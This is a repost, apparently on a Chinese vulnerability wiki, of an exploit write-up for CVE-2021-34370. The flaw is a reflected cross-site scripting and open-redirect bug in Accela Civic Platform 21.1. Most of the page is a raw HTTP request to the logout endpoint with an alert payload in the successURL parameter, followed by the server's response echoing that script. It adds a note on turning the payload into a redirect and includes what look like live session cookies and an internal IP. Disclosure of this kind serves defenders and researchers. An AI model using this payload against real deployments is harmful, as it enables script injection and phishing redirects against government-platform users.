免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS) # Software Link: https://www.accela.com/civic-platform/ # Version: <= 21.1 # Author: Abdulazeez Alaseeri # Tested on: JBoss server/windows # Type: Web App # Date: 07/06/2021 # CVE-2021-34370 ================================================================ Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 ================================================================ ================================================================ Request Heeaders start ================================================================ GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1 Host: Hidden Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ================================================================ Request Heeaders end ================================================================ ================================================================ Response Heeaders start ================================================================ HTTP/1.1 200 OK Connection: close Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter X-XSS-Protection: 0 Content-Type: text/html;charset=ISO-8859-1 Content-Length: 73 Date: Tue, 08 Jun 2021 10:41:59 GMT <script type='text/javascript'>document.location=''^alert`1`^''</script> ================================================================ Response Heeaders end ================================================================ Payload: %27^alert`1`^%27 for open redirect, replace the payload to a valid website.
pwnwiki.com